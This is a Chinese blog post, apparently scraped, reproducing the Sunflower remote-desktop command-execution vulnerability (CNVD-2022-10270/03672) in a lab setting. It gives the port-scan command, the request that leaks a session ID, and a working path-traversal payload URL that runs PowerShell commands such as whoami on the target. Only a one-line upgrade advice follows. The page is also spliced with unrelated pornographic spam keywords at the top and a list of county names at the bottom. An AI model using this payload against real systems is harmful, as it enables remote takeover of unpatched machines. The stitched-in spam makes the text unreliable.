五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

向日葵CNVD-2022-10270/CNVD-2022-03672 復(fù)現(xiàn)

2023-07-21 09:01 作者:逍遙子大表哥  | 我要投稿


向日葵是生活工作中最常用的一款遠(yuǎn)程辦公工具之一。也是目前國內(nèi)市面上用的最多的一款工具。本文來談?wù)勱P(guān)于其CNVD-2022-10270/CNVD-2022-03672漏洞的利用和復(fù)現(xiàn)。

實驗環(huán)境

  • 向日葵 <= 11.0.0.33

  • Kali Linux

端口掃描

我們首先在本地環(huán)境安裝11.0.0.33的低版本向日葵。安裝完成后,并用nmap對靶場進(jìn)行端口掃描。

安裝完成后,在kali中利用nmap端口掃描。

nmap?-p?45000-55000?192.168.50.105

如下圖,我們可以看到目標(biāo)存在61376 61387這幾個端口。

當(dāng)然,為了方便我們可以利用python腳本快速檢測,支持整個網(wǎng)段掃描。



漏洞復(fù)現(xiàn)

在瀏覽器中訪問ip+端口號+cgi-bin/rpc?action=verify-haras (端口號:每一個都嘗試,直到獲取到session值CID

通過上述方法,我們確定了目標(biāo)的端口。現(xiàn)在我們便可以利用payload工具進(jìn)行測試。payload

http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami

訪問paylaod,并在burp中進(jìn)行抓包。

修改Cookie:YqRx8XziEo3PCASesFfsfP5tZWk344ZlCookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl 效果如下:

同樣,我們只需修改后面的whoami為其他的命令如ipconfig即可。

ifconfig命令
dir命令

安全建議

此漏洞算是比較高危的漏洞,請盡快更新到最新版本。

更多精彩文章 歡迎關(guān)注微信公眾號 kali黑客筆記

向日葵CNVD-2022-10270/CNVD-2022-03672 復(fù)現(xiàn)的評論 (共 條)

分享到微博請遵守國家法律
渭源县| 岢岚县| 绥阳县| 十堰市| 富源县| 商河县| 尼玛县| 成武县| 阿拉善左旗| 荣昌县| 故城县| 名山县| 枝江市| 始兴县| 宁陵县| 逊克县| 桂东县| 上饶市| 克什克腾旗| 保定市| 湖口县| 阳泉市| 九龙县| 西乌珠穆沁旗| 鄂伦春自治旗| 咸宁市| 布尔津县| 句容市| 郎溪县| 崇仁县| 弋阳县| 新闻| 壶关县| 信丰县| 平凉市| 元阳县| 祁阳县| 鄱阳县| 尉犁县| 康定县| 宁蒗|